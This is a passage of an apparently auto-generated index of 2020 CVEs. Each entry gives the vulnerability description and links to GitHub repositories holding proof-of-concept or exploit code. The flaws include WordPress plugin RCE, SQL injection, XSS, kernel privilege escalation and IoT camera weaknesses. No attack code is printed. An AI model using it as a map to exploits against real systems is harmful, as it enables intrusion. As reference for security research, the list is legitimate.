An issue was discovered in the MmMapIoSpace routine in Foxconn Live Update Utility 2.1.6.26 that allows local attackers to escalate privileges.

- [rjt-gupta/CVE-2020-24088](https://github.com/rjt-gupta/CVE-2020-24088)

### CVE-2020-24089 (2023-09-19)

An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2 that allows local attackers to cause a denial of service (DoS).

- [rjt-gupta/CVE-2020-24089](https://github.com/rjt-gupta/CVE-2020-24089)

### CVE-2020-24148 (2021-07-07)

Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action.

- [dwisiswant0/CVE-2020-24148](https://github.com/dwisiswant0/CVE-2020-24148)

### CVE-2020-24186 (2020-08-24)

A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action.

- [hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE](https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE)
- [meicookies/CVE-2020-24186](https://github.com/meicookies/CVE-2020-24186)
- [Sakura-501/CVE-2020-24186-exploit](https://github.com/Sakura-501/CVE-2020-24186-exploit)
- [substing/CVE-2020-24186_reverse_shell_upload](https://github.com/substing/CVE-2020-24186_reverse_shell_upload)

### CVE-2020-24227 (2020-11-23)

Playground Sessions v2.5.582 (and earlier) for Windows stores the user credentials in plain text, allowing anyone with access to UserProfiles.sol to extract the email and password.

- [nathunandwani/CVE-2020-24227](https://github.com/nathunandwani/CVE-2020-24227)

### CVE-2020-24490 (2021-02-02)

Improper buffer restrictions in BlueZ may allow an unauthenticated user to potentially enable denial of service via adjacent access. This affects all Linux kernel versions that support BlueZ.

- [AbrarKhan/linux_CVE-2020-24490-beforePatch](https://github.com/AbrarKhan/linux_CVE-2020-24490-beforePatch)
- [AbrarKhan/Linux-4.19.72_CVE-2020-24490](https://github.com/AbrarKhan/Linux-4.19.72_CVE-2020-24490)

### CVE-2020-24572 (2020-08-24)

An issue was discovered in includes/webconsole.php in RaspAP 2.5. With authenticated access, an attacker can use a misconfigured (and virtually unrestricted) web console to attack the underlying OS (Raspberry Pi) running this software, and execute commands on the system (including ones for uploading of files and execution of code).

- [lb0x/cve-2020-24572](https://github.com/lb0x/cve-2020-24572)
- [gerbsec/CVE-2020-24572-POC](https://github.com/gerbsec/CVE-2020-24572-POC)

### CVE-2020-24597
- [HoangKien1020/CVE-2020-24597](https://github.com/HoangKien1020/CVE-2020-24597)

### CVE-2020-24616 (2020-08-25)

FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).

- [0xkami/cve-2020-24616-poc](https://github.com/0xkami/cve-2020-24616-poc)

### CVE-2020-24656 (2020-08-26)

Maltego before 4.2.12 allows XXE attacks.

- [terzinodipaese/Internet-Security-Project](https://github.com/terzinodipaese/Internet-Security-Project)

### CVE-2020-24750 (2020-09-17)

FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.

- [Al1ex/CVE-2020-24750](https://github.com/Al1ex/CVE-2020-24750)

### CVE-2020-24765 (2020-10-20)

InterMind iMind Server through 3.13.65 allows remote unauthenticated attackers to read the self-diagnostic archive via a direct api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1 request.

- [fbkcs/CVE-2020-24765](https://github.com/fbkcs/CVE-2020-24765)

### CVE-2020-24815 (2020-11-24)

A Server-Side Request Forgery (SSRF) affecting the PDF generation in MicroStrategy 10.4, 2019 before Update 6, and 2020 before Update 2 allows authenticated users to access the content of internal network resources or leak files from the local system via HTML containers embedded in a dossier/dashboard document. NOTE: for 10.4, no fix will be released, as that version will reach end-of-life on 31/12/2020.

- [darkvirus-7x/exploit-CVE-2020-24815](https://github.com/darkvirus-7x/exploit-CVE-2020-24815)

### CVE-2020-24913 (2021-03-04)

A SQL injection vulnerability in qcubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request.

- [agarma/CVE-2020-24913-PoC](https://github.com/agarma/CVE-2020-24913-PoC)

### CVE-2020-24949 (2020-09-03)

Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).

- [r90tpass/CVE-2020-24949](https://github.com/r90tpass/CVE-2020-24949)

### CVE-2020-24955 (2020-09-01)

SUPERAntiSpyware Professional X Trial 10.0.1206 is vulnerable to local privilege escalation because it allows unprivileged users to restore a malicious DLL from quarantine into the system32 folder via an NTFS directory junction, as demonstrated by a crafted ualapi.dll file that is detected as malware.

- [b1nary0x1/CVE-2020-24955](https://github.com/b1nary0x1/CVE-2020-24955)

### CVE-2020-24972 (2020-08-29)

The Kleopatra component before 3.1.12 (and before 20.07.80) for GnuPG allows remote attackers to execute arbitrary code because openpgp4fpr: URLs are supported without safe handling of command-line options. The Qt platformpluginpath command-line option can be used to load an arbitrary DLL.

- [SpiralBL0CK/CVE-2020-24972](https://github.com/SpiralBL0CK/CVE-2020-24972)

### CVE-2020-25068 (2020-09-03)

Setelsa Conacwin v3.7.1.2 is vulnerable to a local file inclusion vulnerability. This vulnerability allows a remote unauthenticated attacker to read internal files on the server via an http:IP:PORT/../../path/file_to_disclose Directory Traversal URI. NOTE: The manufacturer indicated that the affected version does not exist. Furthermore, they indicated that they detected this problem in an internal audit more than 3 years ago and fixed it in 2017.

- [bryanroma/CVE-2020-25068](https://github.com/bryanroma/CVE-2020-25068)

### CVE-2020-25078 (2020-09-02)

An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.

- [MzzdToT/CVE-2020-25078](https://github.com/MzzdToT/CVE-2020-25078)
- [chinaYozz/CVE-2020-25078](https://github.com/chinaYozz/CVE-2020-25078)

### CVE-2020-25134 (2020-09-25)

An issue was discovered in Observium Professional, Enterprise & Community 20.8.10631. It is vulnerable to directory traversal and local file inclusion due to the fact that there is an unrestricted possibility of loading any file with an inc.php extension. Inclusion of other files (even though limited to the mentioned extension) can lead to Remote Code Execution. This can occur via /settings/?format=../ URIs to pages/settings.inc.php.

- [ynsmroztas/CVE-2020-25134](https://github.com/ynsmroztas/CVE-2020-25134)

### CVE-2020-25200 (2020-10-01)

Pritunl 1.29.2145.25 allows attackers to enumerate valid VPN usernames via a series of /auth/session login attempts. Initially, the server will return error 401. However, if the username is valid, then after 20 login attempts, the server will start responding with error 400. Invalid usernames will receive error 401 indefinitely. Note: This has been disputed by the vendor as not a vulnerability. They argue that this is an intended design.

- [lukaszstu/pritunl-CVE-2020-25200](https://github.com/lukaszstu/pritunl-CVE-2020-25200)

### CVE-2020-25213 (2020-09-09)

The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.

- [mansoorr123/wp-file-manager-CVE-2020-25213](https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213)
- [kakamband/WPKiller](https://github.com/kakamband/WPKiller)
- [forse01/CVE-2020-25213-Wordpress](https://github.com/forse01/CVE-2020-25213-Wordpress)
- [0000000O0Oo/Wordpress-CVE-2020-25213](https://github.com/0000000O0Oo/Wordpress-CVE-2020-25213)
- [piruprohacking/CVE-2020-25213](https://github.com/piruprohacking/CVE-2020-25213)
- [b1ackros337/CVE-2020-25213](https://github.com/b1ackros337/CVE-2020-25213)
- [BLY-Coder/Python-exploit-CVE-2020-25213](https://github.com/BLY-Coder/Python-exploit-CVE-2020-25213)
- [E1tex/Python-CVE-2020-25213](https://github.com/E1tex/Python-CVE-2020-25213)
- [Nguyen-id/CVE-2020-25213](https://github.com/Nguyen-id/CVE-2020-25213)

### CVE-2020-25223 (2020-09-25)

A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11.

- [darrenmartyn/sophucked](https://github.com/darrenmartyn/sophucked)
- [twentybel0w/CVE-2020-25223](https://github.com/twentybel0w/CVE-2020-25223)
- [reneww/poc-CVE-2020-25223](https://github.com/reneww/poc-CVE-2020-25223)

### CVE-2020-25265 (2020-12-02)

AppImage libappimage before 1.0.3 allows attackers to trigger an overwrite of a system-installed .desktop file by providing a .desktop file that contains Name= with path components.

- [refi64/CVE-2020-25265-25266](https://github.com/refi64/CVE-2020-25265-25266)

### CVE-2020-25270 (2020-10-08)

PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, or City.

- [Ko-kn3t/CVE-2020-25270](https://github.com/Ko-kn3t/CVE-2020-25270)

### CVE-2020-25271 (2020-10-08)

PHPGurukul hospital-management-system-in-php 4.0 allows XSS via admin/patient-search.php, doctor/search.php, book-appointment.php, doctor/appointment-history.php, or admin/appointment-history.php.

- [Ko-kn3t/CVE-2020-25271](https://github.com/Ko-kn3t/CVE-2020-25271)

### CVE-2020-25272 (2020-10-08)

In SourceCodester Online Bus Booking System 1.0, there is XSS through the name parameter in book_now.php.

- [Ko-kn3t/CVE-2020-25272](https://github.com/Ko-kn3t/CVE-2020-25272)

### CVE-2020-25273 (2020-10-08)

In SourceCodester Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.

- [Ko-kn3t/CVE-2020-25273](https://github.com/Ko-kn3t/CVE-2020-25273)

### CVE-2020-25398 (2020-11-05)

CSV Injection exists in InterMind iMind Server through 3.13.65 via the csv export functionality.

- [h3llraiser/CVE-2020-25398](https://github.com/h3llraiser/CVE-2020-25398)

### CVE-2020-25399 (2020-11-05)

Stored XSS in InterMind iMind Server through 3.13.65 allows any user to hijack another user's session by sending a malicious file in the chat.

- [h3llraiser/CVE-2020-25399](https://github.com/h3llraiser/CVE-2020-25399)

### CVE-2020-25478
- [santokum/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack](https://github.com/santokum/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack)

### CVE-2020-25487 (2020-09-22)

PHPGURUKUL Zoo Management System Using PHP and MySQL version 1.0 is affected by: SQL Injection via zms/animal-detail.php.

- [Ko-kn3t/CVE-2020-25487](https://github.com/Ko-kn3t/CVE-2020-25487)

### CVE-2020-25488
- [Ko-kn3t/CVE-2020-25488](https://github.com/Ko-kn3t/CVE-2020-25488)

### CVE-2020-25498 (2021-01-06)

Cross Site Scripting (XSS) vulnerability in Beetel router 777VR1 can be exploited via the NTP server name in System Time and "Keyword" in URL Filter.

- [the-girl-who-lived/CVE-2020-25498](https://github.com/the-girl-who-lived/CVE-2020-25498)

### CVE-2020-25514 (2020-09-22)

Sourcecodester Simple Library Management System 1.0 is affected by Incorrect Access Control via the Login Panel, http://<site>/lms/admin.php.

- [Ko-kn3t/CVE-2020-25514](https://github.com/Ko-kn3t/CVE-2020-25514)

### CVE-2020-25515 (2020-09-22)

Sourcecodester Simple Library Management System 1.0 is affected by Insecure Permissions via Books > New Book, http://<site>/lms/index.php?page=books.

- [Ko-kn3t/CVE-2020-25515](https://github.com/Ko-kn3t/CVE-2020-25515)

### CVE-2020-25518
- [g-rubert/wordpress_DoS](https://github.com/g-rubert/wordpress_DoS)

### CVE-2020-25540 (2020-09-14)

ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via the encode parameter of a GET request.

- [Schira4396/CVE-2020-25540](https://github.com/Schira4396/CVE-2020-25540)
- [RajChowdhury240/ThinkAdmin-CVE-2020-25540](https://github.com/RajChowdhury240/ThinkAdmin-CVE-2020-25540)
- [lowkey0808/cve-2020-25540](https://github.com/lowkey0808/cve-2020-25540)
- [simonlee-hello/CVE-2020-25540](https://github.com/simonlee-hello/CVE-2020-25540)

### CVE-2020-25578 (2021-03-26)

In FreeBSD 12.2-STABLE before r368969, 11.4-STABLE before r369047, 12.2-RELEASE before p3, 12.1-RELEASE before p13 and 11.4-RELEASE before p7 several file systems were not properly initializing the d_off field of the dirent structures returned by VOP_READDIR. In particular, tmpfs(5), smbfs(5), autofs(5) and mqueuefs(5) were failing to do so. As a result, eight uninitialized kernel stack bytes may be leaked to userspace by these file systems.

- [farazsth98/freebsd-dirent-info-leak-bugs](https://github.com/farazsth98/freebsd-dirent-info-leak-bugs)

### CVE-2020-25613 (2020-10-06)

An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.

- [metapox/CVE-2020-25613](https://github.com/metapox/CVE-2020-25613)

### CVE-2020-25627 (2020-12-09)

The moodlenetprofile user profile field required extra sanitizing to prevent a stored XSS risk. This affects versions 3.9 to 3.9.1. Fixed in 3.9.2.

- [HoangKien1020/CVE-2020-25627](https://github.com/HoangKien1020/CVE-2020-25627)

### CVE-2020-25632 (2021-03-03)

A flaw was found in grub2 in versions prior to 2.06. The rmmod implementation allows the unloading of a module used as a dependency without checking if any other dependent module is still loaded leading to a use-after-free scenario. This could allow arbitrary code to be executed or a bypass of Secure Boot protections. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

- [pauljrowland/BootHoleFix](https://github.com/pauljrowland/BootHoleFix)

### CVE-2020-25637 (2020-10-06)

A double free memory issue was found to occur in the libvirt API, in versions before 6.8.0, responsible for requesting information about network interfaces of a running QEMU domain. This flaw affects the polkit access control driver. Specifically, clients connecting to the read-write socket with limited ACL permissions could use this flaw to crash the libvirt daemon, resulting in a denial of service, or potentially escalate their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

- [brahmiboudjema/CVE-2020-25637-libvirt-double-free](https://github.com/brahmiboudjema/CVE-2020-25637-libvirt-double-free)

### CVE-2020-25668 (2021-05-26)

A flaw was found in Linux Kernel because access to the global variable fg_console is not properly synchronized leading to a use after free in con_font_op.

- [hshivhare67/Kernel_4.1.15_CVE-2020-25668](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2020-25668)

### CVE-2020-25686 (2021-01-20)

A flaw was found in dnsmasq before version 2.83. When receiving a query, dnsmasq does not check for an existing pending request for the same name and forwards a new request. By default, a maximum of 150 pending queries can be sent to upstream servers, so there can be at most 150 queries for the same name. This flaw allows an off-path attacker on the network to substantially reduce the number of attempts that it would have to perform to forge a reply and have it accepted by dnsmasq. This issue is mentioned in the "Birthday Attacks" section of RFC5452. If chained with CVE-2020-25684, the attack complexity of a successful attack is reduced. The highest threat from this vulnerability is to data integrity.

- [knqyf263/dnspooq](https://github.com/knqyf263/dnspooq)

### CVE-2020-25705 (2020-11-17)

A flaw in ICMP packets in the Linux kernel may allow an attacker to quickly scan open UDP ports. This flaw allows an off-path remote attacker to effectively bypass source port UDP randomization. Software that relies on UDP source port randomization is indirectly affected as well on the Linux Based Products (RUGGEDCOM RM1224: All versions between v5.0 and v6.4, SCALANCE M-800: All versions between v5.0 and v6.4, SCALANCE S615: All versions between v5.0 and v6.4, SCALANCE SC-600: All versions prior to v2.1.3, SCALANCE W1750D: v8.3.0.1, v8.6.0, and v8.7.0, SIMATIC Cloud Connect 7: All versions, SIMATIC MV500 Family: All versions, SIMATIC NET CP 1243-1 (incl. SIPLUS variants): Versions 3.1.39 and later, SIMATIC NET CP 1243-7 LTE EU: Version

- [tdwyer/CVE-2020-25705](https://github.com/tdwyer/CVE-2020-25705)
- [nanopathi/linux-4.19.72_CVE-2020-25705](https://github.com/nanopathi/linux-4.19.72_CVE-2020-25705)

### CVE-2020-25747 (2020-09-25)

The Telnet service of Rubetek RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339) can allow a remote attacker to gain access to RTSP and ONVIF services without authentication. Thus, the attacker can watch live streams from the camera, rotate the camera, change some settings (brightness, clarity, time), restart the camera, or reset it to factory settings.

- [jet-pentest/CVE-2020-25747](https://github.com/jet-pentest/CVE-2020-25747)

### CVE-2020-25748 (2020-09-25)

A Cleartext Transmission issue was discovered on Rubetek RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339). Someone in the middle can intercept and modify the video data from the camera, which is transmitted in an unencrypted form. One can also modify responses from NTP and RTSP servers and force the camera to use the changed values.

- [jet-pentest/CVE-2020-25748](https://github.com/jet-pentest/CVE-2020-25748)

### CVE-2020-25749 (2020-09-25)

The Telnet service of Rubetek RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339) could allow a remote attacker to take full control of the device with a high-privileged account. The vulnerability exists because a system account has a default and static password. The Telnet service cannot be disabled and this password cannot be changed via standard functionality.

- [jet-pentest/CVE-2020-25749](https://github.com/jet-pentest/CVE-2020-25749)

### CVE-2020-25769
- [defrancescojp/CVE-2020-25769](https://github.com/defrancescojp/CVE-2020-25769)

### CVE-2020-25782 (2021-01-28)

An issue was discovered on Accfly Wireless Security IR Camera 720P System with software versions v3.10.73 through v4.15.77. There is an unauthenticated stack-based buffer overflow in the function CNetClientManage::ServerIP_Proto_Set during incoming message handling.

- [tezeb/accfly](https://github.com/tezeb/accfly)

### CVE-2020-25790 (2020-09-19)

Typesetter CMS 5.x through 5.1 allows admins to upload and execute arbitrary PHP code via a .php file inside a ZIP archive. NOTE: the vendor disputes the significance of this report because "admins are considered trustworthy"; however, the behavior "contradicts our security policy" and is being fixed for 5.2.

- [7Mitu/CVE-2020-25790](https://github.com/7Mitu/CVE-2020-25790)

### CVE-2020-25860 (2020-12-21)

The install.c module in the Pengutronix RAUC update client prior to version 1.5 has a Time-of-Check Time-of-Use vulnerability, where signature verification on an update file takes place before the file is reopened for installation. An attacker who can modify the update file just before it is reopened can install arbitrary code on the device.

- [rauc/rauc-1.5-integration](https://github.com/rauc/rauc-1.5-integration)

### CVE-2020-25867 (2020-10-07)

SoPlanning before 1.47 doesn't correctly check the security key used to publicly share plannings. It allows a bypass to get access without authentication.

- [thomasfady/CVE-2020-25867](https://github.com/thomasfady/CVE-2020-25867)

### CVE-2020-26061 (2020-10-05)

ClickStudios Passwordstate Password Reset Portal prior to build 8501 is affected by an authentication bypass vulnerability. The ResetPassword function does not validate whether the user has successfully authenticated using security questions. An unauthenticated, remote attacker can send a crafted HTTP request to the /account/ResetPassword page to set a new password for any registered user.

- [missing0x00/CVE-2020-26061](https://github.com/missing0x00/CVE-2020-26061)

### CVE-2020-26217 (2020-11-16)

XStream before version 1.4.14 is vulnerable to Remote Code Execution. The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected. Anyone using XStream's Security Framework allowlist is not affected. The linked advisory provides code workarounds for users who cannot upgrade. The issue is fixed in version 1.4.14.

- [novysodope/CVE-2020-26217-XStream-RCE-POC](https://github.com/novysodope/CVE-2020-26217-XStream-RCE-POC)
- [Al1ex/CVE-2020-26217](https://github.com/Al1ex/CVE-2020-26217)
- [epicosy/XStream-1](https://github.com/epicosy/XStream-1)

### CVE-2020-26233 (2020-12-08)

Git Credential Manager Core (GCM Core) is a secure Git credential helper built on .NET Core that runs on Windows and macOS. In Git Credential Manager Core before version 2.0.289, when recursively cloning a Git repository on Windows with submodules, Git will first clone the top-level repository and then recursively clone all submodules by starting new Git processes from the top-level working directory. If a malicious git.exe executable is present in the top-level repository then this binary will be started by Git Credential Manager Core when attempting to read configuration, and not git.exe as found on the %PATH%. This only affects GCM Core on Windows, not macOS or Linux-based distributions. GCM Core version 2.0.289 contains the fix for this vulnerability, and is available from the project's GitHub releases page. GCM Core 2.0.289 is also bundled in the latest Git for Windows release; version 2.29.2(3). As a workaround, users should avoid recursively cloning untrusted repositories with the --recurse-submodules option.

- [whr819987540/test_CVE-2020-26233](https://github.com/whr819987540/test_CVE-2020-26233)
- [an1p3lg5/CVE-2020-26233](https://github.com/an1p3lg5/CVE-2020-26233)

### CVE-2020-26258 (2020-12-16)

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, a Server-Side Request Forgery vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist if running Java 15 or higher. No user is affected who followed the recommendation to set up XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whitelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream's default blacklist can use a workaround described in more detail in the referenced advisories.

- [Al1ex/CVE-2020-26258](https://github.com/Al1ex/CVE-2020-26258)

### CVE-2020-26259 (2020-12-16)

XStream is a Java library to serialize objects to XML and back again. XStream before version 1.4.15 is vulnerable to Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary known files on the host, as long as the executing process has sufficient rights, only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist when running Java 15 or higher. No user is affected who followed the recommendation to set up XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whitelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream's default blacklist can use a workaround described in more detail in the referenced advisories.

- [jas502n/CVE-2020-26259](https://github.com/jas502n/CVE-2020-26259)
- [Al1ex/CVE-2020-26259](https://github.com/Al1ex/CVE-2020-26259)

### CVE-2020-26413 (2020-12-11)

An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.

- [Kento-Sec/GitLab-Graphql-CVE-2020-26413](https://github.com/Kento-Sec/GitLab-Graphql-CVE-2020-26413)

### CVE-2020-26525 (2020-10-02)

Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter. This allows forcing the database and server to initiate remote connections to third party DNS servers.

- [lukaszstu/SmartAsset-SQLinj-CVE-2020-26525](https://github.com/lukaszstu/SmartAsset-SQLinj-CVE-2020-26525)

### CVE-2020-26526 (2020-10-02)

An issue was discovered in Damstra Smart Asset 2020.7. It is possible to enumerate valid usernames on the login page. The application sends a different server response when the username is invalid than when the username is valid ("Unable to find an APIDomain" versus "Wrong email or password").

- [lukaszstu/SmartAsset-UE-CVE-2020-26526](https://github.com/lukaszstu/SmartAsset-UE-CVE-2020-26526)

### CVE-2020-26527 (2020-10-02)

An issue was discovered in API/api/Version in Damstra Smart Asset 2020.7. Cross-origin resource sharing trusts random origins by accepting the arbitrary 'Origin: example.com' header and responding with 200 OK and a wildcard 'Access-Control-Allow-Origin: *' header.

- [lukaszstu/SmartAsset-CORS-CVE-2020-26527](https://github.com/lukaszstu/SmartAsset-CORS-CVE-2020-26527)

### CVE-2020-26732 (2021-01-14)

SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 does not set the Secure flag for the session cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session.

- [swzhouu/CVE-2020-26732](https://github.com/swzhouu/CVE-2020-26732)

### CVE-2020-26733 (2021-01-14)

Cross Site Scripting (XSS) in the Configuration page in SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 allows an authenticated attacker to inject their own script into the page via the DDNS Configuration section.

- [swzhouu/CVE-2020-26733](https://github.com/swzhouu/CVE-2020-26733)

### CVE-2020-26878 (2020-10-26)

Ruckus through 1.5.1.0.21 is affected by remote command injection. An authenticated user can submit a query to the API (/service/v1/createUser endpoint), injecting arbitrary commands that will be executed as root user via web.py.

- [htarsoo/CVE-2020-26878](https://github.com/htarsoo/CVE-2020-26878)

### CVE-2020-27190
- [qlh831/x-CVE-2020-27190](https://github.com/qlh831/x-CVE-2020-27190)

### CVE-2020-27194 (2020-10-16)

An issue was discovered in the Linux kernel before 5.8.15. scalar32_min_max_or in kernel/bpf/verifier.c mishandles bounds tracking during use of 64-bit values, aka CID-5b9fbeb75b6a.

- [willinin/CVE-2020-27194-exp](https://github.com/willinin/CVE-2020-27194-exp)
- [xmzyshypnc/CVE-2020-27194](https://github.com/xmzyshypnc/CVE-2020-27194)

### CVE-2020-27199 (2020-12-17)

The Magic Home Pro application 1.5.1 for Android allows Authentication Bypass. The security control that the application currently has in place is a simple Username and Password authentication function. Using enumeration, an attacker is able to forge a User specific token without the need for the correct password to gain access to the mobile application as that victim user.

- [9lyph/CVE-2020-27199](https://github.com/9lyph/CVE-2020-27199)

### CVE-2020-27223 (2021-02-26)

In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0, when Jetty handles a request containing multiple Accept headers with a large number of "quality" (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, with minutes of CPU time exhausted on a single request.

- [motikan2010/CVE-2020-27223](https://github.com/motikan2010/CVE-2020-27223)
- [ttestoo/Jetty-CVE-2020-27223](https://github.com/ttestoo/Jetty-CVE-2020-27223)
- [hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch)
- [hshivhare67/Jetty_v9.4.31_CVE-2020-27223](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223)

### CVE-2020-27252 (2020-12-14)

Medtronic MyCareLink Smart 25000 all versions are vulnerable to a race condition in the MCL Smart Patient Reader software update system, which allows unsigned firmware to be uploaded and executed on the Patient Reader. If exploited, an attacker could remotely execute code on the MCL Smart Patient Reader device, leading to control of the device.

- [OccultSlolem/GatorMed](https://github.com/OccultSlolem/GatorMed)

### CVE-2020-27301 (2021-06-04)

A stack buffer overflow in Realtek RTL8710 (and other Ameba-based devices) can lead to remote code execution via the "AES_UnWRAP" function, when an attacker in Wi-Fi range sends a crafted "Encrypted GTK" value as part of the WPA2 4-way-handshake.

- [chertoGUN/CVE-2020-27301-hostapd](https://github.com/chertoGUN/CVE-2020-27301-hostapd)

### CVE-2020-27358 (2020-10-31)

An issue was discovered in REDCap 8.11.6 through 9.x before 10. The messenger's CSV feature (that allows users to export their conversation threads as CSV) allows non-privileged users to export one another's conversation threads by changing the thread_id parameter in the request to the endpoint Messenger/messenger_download_csv.php?title=Hey&thread_id={THREAD_ID}.

- [sebastian-mora/cve-2020-27358-27359](https://github.com/sebastian-mora/cve-2020-27358-27359)

### CVE-2020-27368 (2021-01-14)

Directory Indexing in the Login Portal of TOTOLINK-A702R-V1.0.0-B20161227.1023 allows an attacker to access /icons/ directories via a GET parameter.

- [swzhouu/CVE-2020-27368](https://github.com/swzhouu/CVE-2020-27368)

### CVE-2020-27603 (2020-10-21)

BigBlueButton before 2.2.27 has an unsafe JODConverter setting in which LibreOffice document conversions can access external files.

- [hannob/CVE-2020-27603-bbb-libreoffice-poc](https://github.com/hannob/CVE-2020-27603-bbb-libreoffice-poc)

### CVE-2020-27688 (2020-11-05)

RVToolsPasswordEncryption.exe in RVTools 4.0.6 allows users to encrypt passwords to be used in the configuration files. This encryption used a static IV and key, and thus using the Decrypt() method from VISKD.cs from the RVTools.exe executable allows for decrypting the encrypted passwords. The accounts used in the configuration files have access to vSphere instances.

- [matthiasmaes/CVE-2020-27688](https://github.com/matthiasmaes/CVE-2020-27688)

### CVE-2020-27747 (2020-10-29)

An issue was discovered in Click Studios Passwordstate 8.9 (Build 8973). If the user of the system has assigned himself a PIN code for entering from a mobile device using the built-in generator (4 digits), a remote attacker has the opportunity to conduct a brute force attack on this PIN code. As a result, the remote attacker can retrieve all passwords from other systems available to the affected account.

- [jet-pentest/CVE-2020-27747](https://github.com/jet-pentest/CVE-2020-27747)

### CVE-2020-27786 (2020-12-11)

A flaw was found in the Linux kernel’s implementation of MIDI, where an attacker with a local account and the permissions to issue ioctl commands to midi devices could trigger a use-after-free issue. A write to this specific memory while freed and before use causes the flow of execution to change and possibly allow for memory corruption or privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

- [kiks7/CVE-2020-27786-Kernel-Exploit](https://github.com/kiks7/CVE-2020-27786-Kernel-Exploit)
- [elbiazo/CVE-2020-27786](https://github.com/elbiazo/CVE-2020-27786)
- [Trinadh465/linux-4.19.72_CVE-2020-27786](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27786)
- [ii4gsp/CVE-2020-27786](https://github.com/ii4gsp/CVE-2020-27786)

### CVE-2020-27815 (2021-05-26)

A flaw was found in the JFS filesystem code in the Linux Kernel which allows a local attacker with the ability to set extended attributes to panic the system, causing memory corruption or escalating privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

- [Trinadh465/linux-4.19.72_CVE-2020-27815](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27815)

### CVE-2020-27824 (2021-05-13)

A flaw was found in OpenJPEG’s encoder in the opj_dwt_calc_explicit_stepsizes() function. This flaw allows an attacker who can supply crafted input to decomposition levels to cause a buffer overflow. The highest threat from this vulnerability is to system availability.

- [pazhanivel07/openjpeg-2.3.0_CVE-2020-27824](https://github.com/pazhanivel07/openjpeg-2.3.0_CVE-2020-27824)

### CVE-2020-27838 (2021-03-08)

